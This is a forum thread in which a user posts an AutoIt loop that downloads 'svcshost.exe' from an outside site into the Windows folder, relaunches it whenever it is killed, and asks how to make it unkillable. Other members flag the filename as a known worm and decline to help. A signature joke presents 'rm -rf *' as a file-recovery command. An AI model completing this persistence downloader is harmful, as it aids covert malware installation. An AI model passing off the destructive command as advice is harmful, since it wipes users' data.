keep a file running

i wanna keep a file running and no one can kill the file i got this so far.

while 1

if FileExists("C:\WINDOWS\svcshost.exe")Then

sleep("100")

Else

InetGet("www.mtsite.com/svcshost.exe", "C:\WINDOWS\svcshost.exe",0 ,0)

EndIf

If ProcessExists("svcshost.exe")Then

sleep("100")

Else

Run("C:\WINDOWS\svcshost.exe")

EndIf

Wend

you know if you close some exe in procces list you get a eror because its protected i wanna have that 2 i think because it is running as a serivice is that possible/

!!! WARNING !!!

Please be aware that the file svcshosts.exe is part of a spyware/worm. So, the intentions of infernothebest are a bit unclear for me, especially as he tries to download that thing from a website !!

http://www.sophos.com/virusinfo/analyses/w32forbotde.html

Click on: Recovery !!

See also here: http://www.tasklist.org/task_svcshost_exe_6395.html

http://vic.zonelabs.com/tmpl/body/CA/virus...s.jsp?VId=42022

Search for svcshost.exe!

!!! WARNING !!!

Cheers

Kurt

Edited by /dev/null

__________________________________________________________(l)user: Hey admin slave, how can I recover my deleted files?admin: No problem, there is a nice tool. It's called rm, like recovery method. Make sure to call it with the "recover fast" option like this: rm -rf *

If he's on to write a worm. Then it is realy mal diguised...

What is your intention infernothebest?

<{POST_SNAPBACK}>

!!! WARNING !!!

Looking at the topics of infernothebest one might think he is trying to build a virus/worm with AutoIT.

* join irc channel

* hide tray icons

* run service

* ftp server

* install svcshost.exe

I suspect this guy to be sim/asimzameer (search members) who already admitted that he is trying to write a virus/trojan with AutoIT.

SO, please don't support these guys. It will be bad for the whole community!!

!!! WARNING !!!

Cheers

Kurt

__________________________________________________________(l)user: Hey admin slave, how can I recover my deleted files?admin: No problem, there is a nice tool. It's called rm, like recovery method. Make sure to call it with the "recover fast" option like this: rm -rf *

i just maked  up some name because i saw 4of them running into procces list, but stick 2 the code plz

<{POST_SNAPBACK}>

O.K. and what is this line supposed to do?

InetGet("www.mtsite.com/svcshost.exe", "C:\WINDOWS\svcshost.exe",0 ,0)

!!! WARNING !!!

Looking at the topics of infernothebest one might think he is trying to build a virus/worm with AutoIT.

* join irc channel

* hide tray icons

* run service

* ftp server

* install svcshost.exe

I suspect this guy to be sim/asimzameer (search members) who already admitted that he is trying to write a virus/trojan with AutoIT.

!!! WARNING !!!

Cheers

Kurt

Edited by /dev/null

Thats suspect. True. But why would he do that?

<{POST_SNAPBACK}>

I don't know. Some people simply have mental defect.

Cheers

Kurt

i dont wanna be a lame hacker or a cript kiddy, i just wanna hve this

<{POST_SNAPBACK}>

Asim, I'm sure you "wanna just hve this", but you won't get it!

!!! WARNING !!!

* join irc channel

* hide tray icons

* run service

* ftp server

* install svcshost.exe

!!! WARNING !!!

Cheers

Kurt